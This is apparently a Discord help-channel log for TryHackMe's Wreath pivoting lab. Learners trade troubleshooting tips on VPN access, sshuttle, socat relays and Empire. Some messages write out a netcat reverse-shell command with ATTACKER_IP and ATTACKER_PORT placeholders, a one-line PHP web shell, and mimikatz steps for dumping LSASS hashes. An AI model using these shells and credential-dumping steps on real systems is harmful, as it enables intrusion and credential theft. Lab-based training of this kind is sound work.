#wreath-network
1 messages · Page 11 of 1
What is the task?
Task no. 20
Powershell.exe
Listening task....help me
I have an 8 day streak now but the access page is still not showing the connection pack. Any ideas on how I can troubleshoot this?
Hmm... left the room -> logged out -> joined the room -> then it showed the access pack.
Cool
Thanks @dry pendant !
Gave +1 Rep to @dry pendant
you're welcome
Sorry for the late reply, check your request headers, make sure you have the content type header in there and change the GET method to POST
I used the POST method, it works when I command a=whoami. But not working in a=powershell.exe------etc....
Yap.....
Did you url encode the payload?
Yap.... it changes color to red
I also used curl method
But failed to get reverse listening
Hmm maybe you should try another powershell payload
On like revshell.com or something
Payloadsallthethings too
Thanx bro....i will try this
Aight
Bro using curl -x post in powershell.exe. getting " "
Yeah that happens to me too, curl won't work for some reason
What did u use to set up a connection to the git server?
Socat tcp-l:firewall port tcp:attacking ip:1327
Dare I ask why you've called your nc nc-dark?
Also, could you try to get proper screenshots please? There is no way in hell I can read that top one
Also, please don't stick your tools in the home directory. I can see that other people have done that too, but still -- it's not fair on other users of the network
i think that's the example name haha
It's the name Dark used in his videos
The "use your username" instruction has obviously been taken rather literally
imitation is the sincerest form of flattery
Bit late but maybe your listener is on the wrong machine?
I mean if your payload's ip is the ip of the web server then you don't need socat to connect
But if you want to access the git server from your box then I recommend using sshuttle instead since it's like a reverse vpn
So essentially check the ip and port of the payload
Make sure you're setting it up on the right box
@ebon tapir
Oh and you have to enable a port in the firewall too i believe
Ok maybe ignore what i said before and see if the port you're listening on is open in the firewall
Hi guys, I am trying to re-download the OVPN file for the wreath network but I get a 404 error. I also regenerated the file. Does it take a while to be available for download?
?
Thanx bro.....i am just a noob....i come here for learning.....
Thanx bro.... it worked
Nice, i had some similar trouble with empire this morning too
Just needed a bit of time off
Is anyone using wreath right now
Do you have a question?
@strange bison I am in the webserver but the id_rsa file just contains html and no key
Ok, so someone probably broke it on your instance
It's like 25-40 people per network
Disconnect from the network and DM me your config file please -- I can fix it for you
Hey everyone, regenerated my configuration file for Wreath, but when I go to download it, I get a 404 error. It's been like this the last 2 days. Would I need to create another THM account? Not sure why this is happening. I am able to download the openvpn file for the other rooms though. Just not for Wreath.
- I regenerated my configuration file for Wreath
try leaving and rejoining the room
ok
if that doesn't work, clear your cache and log back out/in and then try again, or try rejoining the room after that
thanks I'll try that
hope it works
I've seen a few other people report similar things. Not sure what the problem is.
thanks will let you know
I'm 50% done and I learned a massive amount
wanna finish it lol
yeah, it's a fantastic room
hmm yeah still having an issue
Not sure what is causing it
worst case I'll have to create another thm account. Not sure if it is specific to my account
I highly doubt that
if none of that works, I'd say maybe try emailing support@tryhackme.com
thanks I might do that
or see if you can choose a different vpn server maybe
Can't recall if wreath had options or not
there's only one option for VPN, it just says Wreath
is Throwback going to be similar to Wreath?
it's already out. I haven't done it. It has more boxes, focuses more on Active Directory
ok
Hey i need someone to explain this to me. if sshuttle is like a reverse vpn and i got that connected to the web server, meaning i can view the internal network's web site (and indeed i can, but only for .150, not for .100), the question is what is blocking me from viewing the website on .100 from my machine?
There should be some form of IP whitelisting or something similar on .100, only allowing .150 to communicate.
Ahh now that makes sense
Correct
Hello there! Newbie here!
one question, I just subscribed to THM and joined wreath. The thing is that it says "9 days of access left", should I worry?
No, everything is fine. People get kicked out after a few days, but you can rejoin anytime again
Cool, thanks!!
Hey, may you please provide some details about how are these systems connected to form the network.
The IP whitelisting part, cannot connect to .100 and .150 directly from our machine.
I thought, I can try to figure this out in the Windows Defender Firewall for the rule WebServer by getting a RDP session on the final machine Wreath-PC.
I did a quick run :grin:
But I couldn't find much information in there.
It's all done effectively at the "router" level. You could think of it as almost three subnets with firewalls between them. You won't find anything in the machines themselves though
so all with the aws config?
amazing
Hi, I don't have access to any network even being in wreath room
So i can't continue with wreath room
Leave and rejoin the room
If I leave the room will I have to do a 10 day streak again?
Nope.
Thanks for the awesome room, Muiri! It helped a good bit with the pen+ exam
Don't forget the report!
Hey guys, I am little stuck on Task 17 part 4, which host is it referring to?
A little nudge would be appreciated!
The 2 other hosts that u haven't yet compromised
Get nmap on the server and ip sweep them
I think I got it, I may have misread the results
ok
I used the ip sweep 10.200.72.1-255
That should be sufficient
Np
Hello guys, so i have been trying to recreate the Empire C2 server from the Win Server using http_hop. it worked yesterday but today when I execute the stager, it only gets the /news.php file on that GitServer machine. and nothing else. I wonder if that's a machine issue or something
Windows Powershell error
PHP server log
it got a hit, and yesterday it worked fine. So I am thinking maybe it's a server issue?
Yeah probably just go do something else and come back to it after a while
Dear God, someone is messing with the network
it's like working for like 2-3 minutes? and ssh connection is breaking and the loop goes on
who's messing?
sounds like multiple vpns
there are many different instances of the room also
Hi, I can't use sshuttle, command 'sshuttle -r root@10.200.99.200 -x 10.200.99.200 --ssh-cmd "ssh -i id_rsa -vvv" 10.200.99.0/24 -vvv', here is the debug message
after I change the mtu of wlan0, it returns error code 255, adding '-x' option doesn't work :"<
Is it normal to have to download a new ovpn file to reconnect to the network?
When I am inactive for several hours and try to continue with the room (it says it's running at the top), I can't connect to any machines and it seems my vpn connection doesn't work. I will kill that connection and try to reconnect but it won't connect unless I download a new ovpn file. Not a huge deal because it only takes a couple of minutes to get a new one but I was just wondering if anyone else has had that issue.
Yeah, I've had similar issues. But I was most of the time able to fix it by doing "ifconfig tun0 down" + "ifconfig tun0 up"
When it seemed persistently unwilling to work properly, I used that THM Python script that does all the checks for you. There it often told me that there were two concurrent connections running. Maybe you're experiencing something similar.
Thanks, I will try both of these.
Gave +1 Rep to @tender panther
Yw. Hope it helps!
if i'm a paid user, do i still need a 7 day streak to have access?
Streak limitation is only for free users, so no
k for some reason i have no access to any networks
You should have access to wreath if you subscribed. If you want access to throwback, then you have to pay extra
i'm looking at my access panel and it says i don't have access
i still have my old ovpn file, but it doesn't connect (it's from a month ago)
is there somewhere i can create a new ovpn file?
You could try to clear cache / relog
how would i do that?
im able to answer questions but i dont have access to the server? lol
got it. had to leave and rejoin
What's the full command you used?
make sure that there is a blank line at the end of the file
Yeah Done!
Thanks Man
Is Wreath down??
I am unable to connect to the network. Tried pinging too
the network goes to sleep after a while, you might have to start it back up again
I tried that.
hi, can you post the IP address of one of the machines on your network please? I can check to see if it's up or not
for CVE-2019-15107 (https://github.com/MuirlandOracle/CVE-2019-15107) my shell hangs whenever I type shell for rev shell, is something broken on my end?
No, it tells you to press enter when you have a netcat listener started
I couldn't press enter earlier
4? shouldn't it be 5?
3306 shouldn't be publicly accessible iirc. Either someone's messed with that machine, or your nmap is throwing a false positive
That's my response from it
Hi, Are we allowed to share a complete WriteUp for Wreath?
I don't think so... did you use burp suite, because I didn't
you can submit one to the room
but the format is that of a full pentest report
I wrote a normal Write Up for my Medium Account
You'll have to ask @merry robin about that then
In terms of getting accepted to the room: no, because there are explicit instructions for it. In terms of existing, I don't mind
Cool.
didnt find this in the cli tho
ah ok.. thanks !
Gave +1 Rep to @merry robin
What version of empire are you on? If 4.0 is publicly accessible now then that whole section needs a rewrite
3.8.2
Then that should work just fine
i didn't understand where to find the shell, in HELP i couldn't find it
oh nvm am blind
sorry for the trouble
kill not working?
it's the fact that am dumb but need help
Hello, I would like to know why I have no access to the Wreath network, I'm subscribed and my streak is enough
Have u joined the room?
And is ur streak 7?
If yes and u are unable to get the vpn try leaving the room and join again this should help
It worked for me, thank you
np
is something up with the network? there's crazy packet loss and it's really frustrating
literally I just started with this room and I'm running the nmap scan and the network goes down mid scan
.-.
like im doing a simple nmap scan and it's telling me i got 5 hours left
nah i didnt I even rebooted
got it
When i am running the nmap on the compromised server, its throwing me an error as Permission Denied. What's wrong here ?
Sounds like you haven't made it executable @fluid shoal
ohh yeahh.. sorry my bad.. Thanks
Np
Hello i'm getting this error with socat reverse shell any idea ?
You shouldn't need to send back a reverse shell since you're already on the machine (and I think root has an id_rsa in the ssh folder?). If you're trying to pivot using socat, make sure to modify the firewall rules to allow you to use port 8888.
hi guys, whenever I try to use evil-winrm i get stuck on the "Info: Establishing connection to remote endpoint" line, do we know any possible reason?
evil-winrm -u sniperop -p <password> -i 10.200.71.150 -P 5985
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
also I am getting this error later on
error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
like I dont have direct connection to the git-stack machine from my machine
Of course you don't -- that's why there's pivoting involved...
What technique did you use to pivot?
first i used ssh port forwarding and then sshuttle
sudo sshuttle -r root@10.200.71.200 --ssh-cmd "ssh -i webserver/id_rsa" 10.200.71.0/24 -x 10.200.71.200
And that is still active?
yup
yup
Both open?
yup
Could you disconnect from the VPN and send me your config file please?
Preferably over DM so it's not in the public chat
Your .ovpn file
DM
I have issue with running mimikatz after getting the RDP session
It gives an error when I run privileged::debug
Any ideas how to fix it
For .150 network
Start it as an Administrator
As in, right click -> Run as Administrator
Hi Guys, been having an issue since this morning. I can't reach any machine in the network, have regenerated my connection pack and the problem remains. What else can I do?
Hi Guys, Why do i get sometimes the below error while creating a reverse shell and not always ?
[*] Start a netcat listener in a new window (nc -lvnp 1563) then press enter.
[+] You should now have a reverse shell on the target
[*] If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53
Right now i am getting this error and not able to fix this
Leave the room and rejoin
Try leaving the room and rejoining.
Hi Guys, I cannot see port 10000 opened on the .200 server when I ran an nmap scan? what might be the issue ?
PORT STATE SERVICE REASON
10000/tcp closed snet-sensor-mgmt reset ttl 63
Thank you @merry robin for all the effort you put in creating this room and all the content you managed to put in there. A long and satisfying journey!
Gave +1 Rep to @merry robin
About to start wreath, wish me luck!
Good luck!
A bit late but 4.0 was just dropped today.
We are happy to announce the GA release of #Empire 4.0 and #Starkiller 1.8 to Kali. A lot of effort went into this, and we hope that it will be as valuable to teams as it has been for us. Just to outline a few of the main changes:
#Cybersecurity #Infosec #RedTeam
Yep, I saw the tweet. Congrats!
I'll get an update to Wreath out ASAP
Let me know if you need any help with screenshots or walkthroughs. I'm happy to lend a hand.
Thank you!
Wreath 2.0 when
We'll see. Should have an Empire Section 2.0 in CMN's inbox tonight though
The Empire (4.0) Strikes Back.
how get a revshell on local machine from pivoting machine using ssh remote port forwarding
Anyone else have trouble with Task 5 when adding <Target IP> thomaswreath.thm to your /etc/hosts file? The changes I've made are being ignored, so the website still won't resolve. I've edited /etc/hosts as root and cleared my Firefox browser history and cache. I can ping/nmap the target without issue, however the connection always times out when I try to browse to it.
hey guys
i have a problem with entering the network
last task of pre security
can someone help me
I'm having trouble accessing the network too. The VPN is up with MTU at 1200 and the Wreath machines are up. but I can't ping the web server. Any thoughts?
I've left, rejoined and generated a new OVPN file too, but no change.
all good now
BTW on task 40, im having trouble uploading netcat onto wreath-pc using curl + powershell. I get a connection back but the file is not downloaded. Is it the anti-virus at work or something else I'm missing?
this is me getting a connection back from wreath-pc, but it's like the connection prematurely breaks or something
I've decided to work from the web shell for task 41. might change to using SMB server from impacket for uploading curl & the other exploits
Update:
Wreath has now been updated to handle Empire 4.0. The changes are live, so let us know if there are any problems!
Task 31 is new?
It must be. I completed it before that existed
Yessss it is!
It's a part of the new changes for Empire 4.0
It's mostly contextual as far as I can tell for the changes that we had to make
"we" me being 10% me & 90% muirl LMAO
I am forwarding port 80 of 10.200.51.150 to my 7777 localhost
but this is what i get on my browser?
what can be the issue?
Wreath task18
Who says there's an issue?
the tasks says that a login will be displayed
As a general rule, use the hints before asking for help -- they are there for a reason
Nothing wrong with asking for help, but if you do it before using everything that you've been given (and before researching for that matter), then it's not nearly as beneficial
noted
I've just finished the network. The most amazing learning I had to date!! I'm writing the report in the following weeks! Thanks A LOT @merry robin !!!
Gave +1 Rep to @merry robin
yo, i just get "ssh-rsa: command not found" in Task 11 of Wreath room.
I have to write this command but the command doesn't exist and i tried a sudo apt install ssh-rsa but it doesn't exist, any ideas ?
ping me if you have an idea
That line you're supposed to copy and paste is supposed to prepend the public key. It's not an actual command or tool.
Suppose I compromised a server and have ssh access. It is also connected to a second server which is in the internal network. I port forward a port of the internal server and get an rce on that. Now if i start a nc listener on the first compromised server and then execute a shell through the rce gained on the internal server, and i specify, let's suppose, port 6666, then i will receive a reverse shell of the internal server on my ssh of the first server.
Now if i do local port forwarding and forward port 6666 of server 1 to my localhost:8000 the connection should be chained back to me. My question is that if i do nc 127.0.0.1 8000 on my machine, then will i be able to get a working shell on my machine?
can any one clear this
That sounds like what the room tells you to do?
I used the relay method to get shell on the git server, but the other method which the room tells is to get a reverse shell on the ssh of the first machine
My question that can i forward that shell again to my machine
That's what the relay does
Leave and rejoin the room
U will get access to wreath vpn config file
you've joined the room and have a 7 day streak right?
but if i will leave
i again need a
7 day streak?
no
oh ok
U got the answer
I m stuck on the empire part for quite a few days now. Anyone else faced the same problem??
i cant start the empire server?
Um, I'm gonna refer you to the Discord link in the pins -- see if the Empire guys know
My client is running fine so it's not installation problem i think
I'm unable to run the CVE for Task 6. I've tried troubleshooting by leaving the room, re-entering it, and then re-generating my configuration file but still no luck. Any suggestions?
I should also add that I've never been able to get the website to resolve from Task 5 either, even after editing my hosts file. I just jumped to the CVE hoping that I could carry on with the lab from this point on.
try to ping the server and see if it's up, if it doesn't respond it could be it's down. Also what does your /etc/hosts file entry for thomaswreath look like?
Thank you for the reply. I can ping the server just fine, no problem there. Here is the /etc/hosts file:
can you connect to it with netcat? Could just be that the network needs a reset.
I'll give nc a try the next time I take another shot at wreath, but yeah, probably time to just vote for a reset and cross my fingers. Thank you though.
Anybody else had a problem with empire-framework after installing it through apt package manager?
The empire server doesn't start
This issue
I told you, ask the BC-Security guys -- they made the thing
Finished the room. No issues with empire on my end.
I should mail them?
Will I receive the port scan back on my screen or not? Because the module section in the room showed an example of the sherlock module and it gave the results on the same screen
I'm having an issue getting Mimikatz to run on the Windows box; I've tried both 32 and 64 versions to the same error message (below). Anyone know why it is being so cranky?
Perhaps of note is that xfreerdp is not cooperating with me either, so instead I used RDesktop to login, hosted a py server locally, and then pulled the files over with certutil
Okay! I got Mimi working. Found a Drive Share option in 'man rdesktop' to use and with the Drive Share it works flawlessly. Still would be interested to know why the certutil avenue went so hard on its face though if anyone has any thoughts. I'm starting to wonder if pulling a file through a port relay on that intermediary machine may have compromised the file integrity or some such?
-undelete 1
Up to 10 last deleted messages (last hour or 12 hours for premium):
none...
I am connected to the gitserver through evilwinrm. I have portforwarded the gitserver port 5589 through ssh local forwarding of first webserver
ssh -L6001:10.200.51.150:5985 root@10.200.51.200 -i webserverssh NOw i access the evil-winrm shell through 127.0.0.1:6001
but i have a problem understanding now how to set up a proxy to connect to the personal pc
I have been stuck at this from yesterday so any help will be appreciated
1. prod-serv - 10.200.x.200
2. git-serv - 10.200.x.150
3. wreath-pc - 10.200.x.100
You can connect to wreath-pc in a similar way as you have connected to git-serv
prod-serv is allowed to access git-serv, this is why you can access git-serv through prod-serv
So in order to access wreath-pc, you will have to somehow access it through git-serv (you may already have visualized the network connections)
Thanks to Muiri, the room is pretty clear in every task.
For example, you can use sshuttle to route traffic first through prod-serv then through git-serv and finally you get access to wreath-pc.
Gave +1 Rep to @leaden oyster
||Setup a server on git-serv to allow you access to wreath-pc.
You can use plink.exe or chisel.exe as provided in the room
Always try ping YOUR_MACHINE to check if you can access your own machine to create reverse shells||
||thanks ,btw it worked. I remote forwarded from gitserver to first webserver using chisel. Then Localforwarded using ssh to my localport||
it worked but the thing is i didnt used sshuttle because i didnt want to rely on on ssh connection so much. And yeah the room is so fun and I am learning new things
There can be multiple ways to achieve the same or at least a similar result. Muiri made me greedy to wait for a sequel
Why do you not want to rely on ssh?
because I think getting a ssh connection as any user would be difficult to get in real assessments
i have been preparing myself for real things from the start, so i usually follow the do's and don'ts just like we would do in real assessments
I got your point
idk i may be wrong, But hey i got the thomas web running

If there's a Linux server with SSH (or less commonly a Windows machine with SSH), which wouldn't be hugely uncommon for public facing devices, then you will nearly always be able to use SSH to some extent or another.
There's a reason these tools exist.
oh nice
so stumbling upon ssh credentials or private keys in real life is common?
Less common than making your own
Credentials, possibly
Private keys should never be transferred, so having the private key of a user in the box in the authorized keys file for that account would be a little... odd
Root login should also not be active
I heard that most ssh connections require private keys alongside passphrase in real networks
so credentials only will not help us in that case
Those are encrypted keys, and we can also restrict the access to specific hosts, IPs. Just like how Muiri did with this room. (cannot access a server two hops ahead)
hey quick question here, what happens to the Empire C2 when a client go offline, do we lose the client or do we just lose connection until the client comes back on?
If the victim goes offline in terms of internet then the implant will keep trying to connect back until it gets access back -- I.e. the agent will keep working once the victim regains internet (in theory)
If it goes offline in terms of switching off or restarting then the agent will die. The solution to that is setting up persistence (e.g. scheduled tasks, autorun scripts, etc)
Gave +1 Rep to @merry robin
Np :)
How often does it take on average for Wreath to reset? It's at 11m uptime and it still says "Resetting"
Gave +1 Rep to @merry robin
Np
One more thing
I'm trying to run the python script to get into .150 but it says "No module named requests"
When I use pip to install it, it says I already have it
"requirement already satisfied"
That's a Python2 vs Python3 thing
Try python2 -m pip install requests
Failing that, use the script I have pinned in here
Ohhhhhhh oh thanks
Now it's saying pip isn't installed
I think I only have pip3 installed
Ok I installed pip2 and installed requests and now it works, thanks again @merry robin
Gave +1 Rep to @merry robin
Np
can anyone give me a tip on how to properly setup task 18
What do you mean by "setup"?
I'm struggling with using the recommended tool to setup my connection
Screenshots would be useful
ill see what I can do, I suddenly cant even ping prod-serv anymore so idk what thats about
Happened earlier too
The network you're on is down again (it's been two hours since we got things up again in #room-help) networks are only active for 2 hours at a time unless they're restarted/started again
Mhhm I wonder why the network map / status is so unreliable atm
I'll report it to the software engineer team
That's so odd
and it makes it so I cant interact with the start, so I guess im on a 2h time out lol
Yeahhhh it sounds like it
I tried regenerating the vpn config too but didnt change it
If you were to leave the room and re-join you should be switched onto a different network
Let me test that
Yess
If you use the grey cog in the room -> leave you can join the wreath room again and it'll put you onto a new network
okay, if I do that, is my current vpn info still fine though or will I need to regen?
You won't lose your progress in terms of the answers that you've submitted already
You'll need to regen (:
okay no big deal :p thanks again @fair breach
Gave +1 Rep to @fair breach
I wonder why that network is being funky
it keeps showing me a different subnet when im not joined, then when I join its the same one
like if I leave it shows a different subnet but as soon as I rejoin, back to the original
Mhhm yeah so it seems
Okay the 121 network is resetting now, let me look at the backend
I'm trying to run the powershell reverse shell with the python script and it's giving me a syntax error, am I not supposed to run the reverse shell through the script?
I blame Holo
figured out the problem I was having that wasnt network related, went and watched the walkthrough video for task 18, I just didnt understand how sshuttle worked basically.
Nvm I wasn't supposed to put the reverse shell into the script, me big dum dum
Ooooooookay new problem - WinRM is giving me odd errors
The error message is too long but apparently Discord can put it in a text file so thats neat
yeah it seems all wonky again on mine too
im going to take a break for a bit anyway I think lol
I was just about to pull the trigger on .150 too
I was working on the c2 stuff lol
gonna take me a bit to reassemble that position but oh well I guess lol
Oof
I kinda just decided to try tackling this room earlier today on a whim anyway, I didn't really realize what I was getting myself into, but im glad I made it that far, i've been in big brain time for a bit on this one. Never attempted anything of this scale until now
If you're on 10.200.121.* still then the machines are still up & active (:
i am but for some reason it seems like things arent working anymore
interesting
I can ping okay personally
without trying to exploit/access anything that is
im on 10.200.49.x
yeah, cant ping anything, was in the middle of setting up the c2 stuff and now I cant even ping the entry point
^^^^^^
Ah yeah, the machines on 10.200.49.* are stopped atm @patent raven
Have been for about an hour it looks like?
sshuttle disconnected and everything in 121
Ohhhh when I refresh it says stopped
ah
Can you ping 10.200.121.250 @uneven thorn ? that is the internal IP of the VPN server for that network
your machines are booting up now @patent raven give it a few mins to setup etc (:
Also can I use RDP for the post-exploitation on .150? I can't get evil-winrm to work on my machine
Yeah I hit start, I just had to refresh my browser lol
I personally don't know I'm afraid
my openvpn is hanging for some reason
I mean it lets me do it but I'm asking because the task says to avoid it
but I can't get evil-winrm to work
TLS key negotiation failed, im going to try regen-ing again maybe?
Mhhm I don't think regenning will solve that issue
Can you try connecting to the normal THM vpn servers? i.e. using your normal ovpn file?
it worked
idk, I regened, redownloaded rm old, mv new fire up openvpn, ping worked
im having a real tough time wrapping my head around this empire thing
when I setup listeners do I use my attacker IP or do I use one of the compromised servers? how do I even use the stagers? like im on the agents part and I just cannot figure out what im supposed to be doing
Is it compulsory to learn about empire? To go ahead in wreath network
where does apt install empire?
I'm having trouble locating the scripts for the ps1
found it in the tools zip
wewlad, what a ride that was. good luck everyone!
That was actually probably one of the hardest things I've ever done. Really had to beat my head against the wall for a while there
Knew I forgot something after the big update. Will update that in a minute.
Which bits can be clarified in that section? :slight_smile:
Hi! Did anybody get the "connection refused" error when trying to connect via SSH in "Task 18 - Git server pivoting" of https://tryhackme.com/room/wreath? Do you know how to fix this to do pivoting?
Make sure the network is up
yes, it is. network is up and I am connected with IP 10.50.54.31
Wait what are you trying to ssh into?
what do you mean?
yes, i mean that i am trying to do pivoting through sshuttle. i would like to run the command ssh -i key.rsa root@10.200.98.200, so exploiting the --ssh-cmd I could do "--ssh-cmd "ssh -i key.rsa".
i am trying to run the command from my attacking machine in order to reach the webserver that is on 10.200.98.150
sshuttle -r root@10.200.98.200 --ssh-cmd "ssh -i key.rsa" 10.200.98.0/24 -x 10.200.98.200 &
Connection looks...
Fine to me
Maybe just wait around for a bit and try again?
Its weird like that sometimes
already tried from 12 a.m., something is not working. may it be an issue related with the network?
also when running ./CVE-2019-15107.py 10.200.56.200 for the exploitation task, the received error is "[-] Failed to connect to http://10.200.56.200:10000/", so host seems down!
yes, it is the IP showed on the running network on THM.
Hey, sorry I ended up going to sleep, that was a long one yesterday! Maybe when getting to that part there could just be a note reminding a person that a copy of the ps1 script for Invoke-Portscan is included in the downloaded task files zip?
That was an amazing challenge tho, so glad I decided to try tackling that yesterday!
How many votes does it need for a reset (8 players)? Looks like someone deleted the private key on .200 ...
or is there someone who could provide me with said file (already got root on that machine)
It does let you vote again after an hour so technically you could just wait 8 hours...
Ahh good to know, thanks!
You shouldn't have to though
@spice coral if it's still a problem, disconnect from the VPN and DM me your config pack please :)
I'll fix the thing manually
According to Task 6 you are supposed to copy the file (/root/.ssh/id_rsa) to your attacking machine if I understood it correctly, though the file in my network is empty:
Yeah, you shouldn't have to wait 8 hours to be able to reset it again just because someone is being a dick
(Hence offering to fix it)
Is it not listing an id_rsa in that screenshot?
Yea but it's empty (the zero after the group indicates the filesize)
Oh didn't notice that, sorry!
Do we need to maintain a 7 day streak once we join the room?
No :)
All good
ur too good for humanity
Hello
I have a problem on task 21
on post exploitation
I want to dump the NTLM hash for administrator
from LSASS memory
with mimikatz
and when I'm trying to do privilege::debug
I'm getting one error
I tried with x64 and x86 too
Same error from both?
No problem :) glad you got it tho!
Hi! I just joined Wreath and I see this at the top left of the page. Does this mean that after 9 days, I will no longer be able to do Wreath?
After 9 days, you'll need to rejoin the room
ahhh i see... thank you for the fast reply!!
I finally got my pivoting up and running 
man this machine takes forever to respond to my revshell
Hi, can anyone help me with sshuttle? I'm working on a Kali Linux machine on WSL2 in Windows and I get a fatal error regarding iptables and can't figure out the issue. See screenshot. Thanks
Can someone please help me with Wreath task 20? I can't get a shell back from 10.200.90.150. I've added a firewall exception using curl POST and firewall-cmd --zone=public --add-port PORT/tcp, I've set up a socat relay on 10.200.90.200:15100, and I have an nc listener on Kali port 443
I've tried using both Burp and the command line, but nothing happens apart from the server returning " " and the listener still listening
Although, I did not check the "encode all special characters" when using CyberChef, could that maybe be it?
I wasn't sure if I should encode every special character or not, I'll try again encoding all of them and see if it works better.
Feelsbadman, still no luck even after encoding all special characters
oh my god man I can't for the life of me figure it out, I thought for sure I had got it now because I realized 1) I set up the listener on the wrong machine, instead of the webserver 2) I put in the wrong port and wrong IP
but even after fixing these and following the writeup, where the command works, it still doesn't do anything
(Task 43)
Could someone explain to me why the wrapper file is called "System.exe" after copying and not "SystemExplorerService64.exe" like the legitimate file?
It's mimicking the System directory, not the original exe
Hmm I think I got it but definitely gonna conduct some more research
Thanks for the answer 
Gave +1 Rep to @merry robin
After 2 days I finished Wreath, thanks Muiri for the awesome room, learned quite a lot
how can I run the powershell-empire on the attack box
You can try uploading nc.exe and get shell that way.
How though? I don't have a shell on the Windows machine
that's what I'm trying to do
The one I have a full shell on is the linux machine
You have web shell right?
yeah on the prod-serv
I can run remote commands on the Windows server but for some reason it completely and absolutely REFUSES to let me get a reverse shell, I tried restarting the listener etc. and followed the writeup where the command worked but still no luck for some reason
I must have messed something up surely since it's obviously supposed to work but I seriously can't figure out what, the listener and firewall exception use the same port, I input the prod-serv IP for the IP part of the reverse shell command and everything but nope
I've tried using -X POST and -XPOST as well
tried with both burp and CLI
I was having trouble with powershell shell so I uploaded nc.exe binary and got a shell through it.
how did you upload it to the git-server prior to getting a shell on it though?
You can execute Windows commands through webshell so certutil or curl whichever works.
True, let me think for a moment and see if I can figure something out. Thanks for the nudge
Gave +1 Rep to @waxen orbit
Well actually one last thing
for some reason using Burp is completely broken atm, so I can only do it all through the CLI. Doing any command gives the same response as a blank command, but since the CLI works it's not really an issue
Thank you again
It should work with Burp too. Make sure to use post request.
Yep using POST, triple checked that everything was correct, it worked until it suddenly didn't anymore
Show burp request screenshot.
One sec
Doing powershell.exe -c "curl kali-ip/nc.exe ; nc.exe (after cp'ing it to the directory) didn't work unfortunately by the way. It stood still for a moment before returning " "
Actually let me try with a fresh burp intercept because I ended up closing the window
Try running it with sudo. I know that sshuttle can be a little bit finnicky, especially if the network just started up, so just keep trying it. Your syntax looks fine.
I am at task 42 where we get a full shell back from the PC (3rd server). The task says to execute powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe and I am getting a shell back. But if I execute the same command but with cmd.exe I don't get a shell back. cmd.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe. Like this
This is what I get in my browser when I run with cmd.exe and don't get a shell back in my nc listener
What can be the reason, I want to ask? Shouldn't it work with cmd.exe too?
Sure one sec.
I might have realized what the problem is, I think I forgot to create a socat relay to forward the shell prior to running the powershell exploit command. I'm going to try setting one up again, but I have a question: if I set up a port exception on port 17010 on the CentOS firewall, should I use port 17010 for both the netcat listener and the relay? I'm slightly confused how I'm going to syntax the relay to make it work
So to add some context, in the Wreath example for the Socat relay, port 443 is used for the netcat listener catching the relay shell. Should I change that to 17010 in this case?
And again, in the example, port 8000 is used for the socat relay listener, should I change that to 17010?
I still haven't completely wrapped my head around the syntax for the port tunneling tools
no luck so far, ugh, why can't I catch this shell, man
hey at least it's realistic now I guess
You know what, I think it's gonna work this time using nc.exe, gonna give it another try
Can't get it to curl 
It gave the same response. For some reason the date on the response is stuck, its like two hours behind
Use the firewall port which you opened.
yep tried that, for some reason still not working. Should I leave the other ports the same or use 17010 for all of them?
What I did is uploaded nc.exe to .200 machine and then launched http server there and grabbed it from prod machine.
Okay, can you execute commands through the web shell? Like, does the whoami command work?
yep whoami, powershell pwd etc. work fine, it's just this shell command that won't work for some reason
Ooh let me try that, I tried curling it from my attacking machine
which come to think of it
won't work because .150 can't access my Kali machine
You need to open firewall port for http server port otherwise prod-serv machine cannot connect to it iirc.
Alright, I'll give that a try. So if I open the HTTP server on prod-serv on port 4242, I'll add an exception using the same firewalld command, but using port 4242?
Yup.
alright got it, thanks! I'll give it a shot, one sec
Lmk if it works or not.
of course! 
Whats up with this? for some reason the netcat relay has broke now too
this machine slowly but surely makes sure each step of this process works backwards, each step taking a working process with it 
There's no jobs running, so not sure why it's in use
maybe another user?
Wait, do I even need the relay if I use nc.exe?
Process is already running in background. Kill it.
Yup.
yes it is
yep that fixed it, let me give nc.exe a try now. One moment
Did not work 
Curling it to the 150 machine worked flawlessly though
but executing the .exe did not give a shell
used this command
Is netcat uploaded?
that was what was used in the socat relay example so I tried that, should it be the prod serv?
can i just remove that part entirely?
the -e one that is
Use cmd.exe instead of /bin/bash.
Alright, one sec!
No luck, I used the IP for prod-serv instead of localhost, together with port 17010 like the exception I set up in the firewall
Show command without url encoding.
I was about to ask, does ./ work on powershell? My PS knowledge is seriously lacking
Windows uses \. Try the full path for nc.
Sure, one moment
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
Like this.
Should I use C:\ or C:/\ ? pwd gives C:\
ught
how do i not escape the character lol
pretend the / is a \ lol
I changed it to -h to see if it's even executing, it's not for some reason
tried both full path and .\
Do you need to change permissions like on linux with some weird powershell equivalent of chmod 700?
Just type c:\your-path-to-nc.exe -h and see if it returns output or not.
One moment
oh
you mean on the attacking machine
yeah it does, i checked prior to running it on powershell
On git-serv web shell.
c:\your-path-to-nc.exe --help type only this no powershell.exe or anything on git web shell.
Should I URL encode it?
Try with and without encoding.
Sure, one moment
aaaaaaand now the CLI version broke too, what the hell is going on man
Maybe I should add, I'm on the 10.200.90.x subnet of Wreath
I noticed some other users get a different subnet
Let me try encoding it though
Nope same error 
why is each component slowly but surely breaking
this room has a grudge on me or something
Oh no.
lemme try whoami
curl machine broke, return later
wth man lol
hey at least the room is challenging 
You think regenerating the wreath network file would do anything?
That's uh well... Nice spirit...
always gotta see the bright side lol 
No, I don't think so. We can try to upload another web shell there which will accept get request instead of post. So, it'll be easier to just paste commands on browser.
Sure worth a try
Yeah, modify the exploit to accept get request and see if it works or not. Or upload the same one with different name.
Otherwise it needs a reset ig.
How would I do that?
the binaries are encrypted or encoded or something, it's all gibberish when opened with vim
Yeah, they are compiled.
In code review section it is explained iirc. Replace <?php system($_POST['a']); ?> with <?php system($_GET['a']); ?> and then change the web shell name to different one in exploit.
Thank you, one moment
Gave +1 Rep to @waxen orbit
I left the Wreath room and can't join now without a 7-day streak.
feelsbadman, did you leave completely? cause if you joined once you can get back in without a streak
Nah, it's fine, I already completed it. I could have speed run that part to confirm. Can't remember, I probably left it after completing.
alright, reuploaded it now with GET method and different name
